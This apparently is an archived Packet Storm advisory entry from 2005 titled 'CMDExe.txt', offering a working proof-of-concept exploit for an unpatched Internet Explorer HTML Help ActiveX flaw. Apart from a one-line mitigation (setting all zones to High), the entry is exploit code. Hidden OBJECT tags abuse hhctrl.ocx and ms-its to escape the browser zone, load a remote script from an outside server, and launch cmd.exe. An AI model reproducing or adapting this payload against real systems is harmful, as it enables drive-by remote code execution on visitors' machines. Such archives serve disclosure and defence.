Lucene search
K

CMDExe.txt

🗓️ 02 Jan 2005 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Unpatched Auto SP2 RC Exploit vulnerability; set Internet Explorer zones to High security level.

Code
`  
  
This unpatched vulnerability is a variant of the "Auto SP2 RC Exploit"  
  
Solution : Set the security level for all zones to "High" in Internet Explorer  
  
// index.htm //  
  
<html><head></head>  
<OBJECT style="display:none" id="locate" type="application/x-oleobject"   
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"   
codebase="hhctrl.ocx#Version=5,2,3790,1194">  
<PARAM name="Command" value="Related Topics, MENU">  
<PARAM name="Button" value="Text:_">  
<PARAM name="Window" value="$global_blank">  
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm  
::/alt_url_enterprise_specific.htm">  
</OBJECT>  
<OBJECT style="display:none" id="locator" type="application/x-oleobject"   
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"   
codebase="hhctrl.ocx#Version=5,2,3790,1194">  
<PARAM name="Command" value="Related Topics, MENU">  
<PARAM name="Button" value="Text:_">  
<PARAM name="Window" value="$global_blank">  
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"  
<script language=\\\"javascript\\\" src=\\\"http://server//htm.txt\\\"\"+  
String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>  
</OBJECT>  
<script>locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout  
("window.opener=null;window.close()",10000)</script></body></html>  
  
// htm.txt //  
  
document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>  
<param name=command value=shortcut><param name=item1 value=',cmd.exe,/c pause,'>  
</object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>  
<param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");  
  
// Original Advisory http://www.freewebs.com/shreddersub7/expl-discuss.htm  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation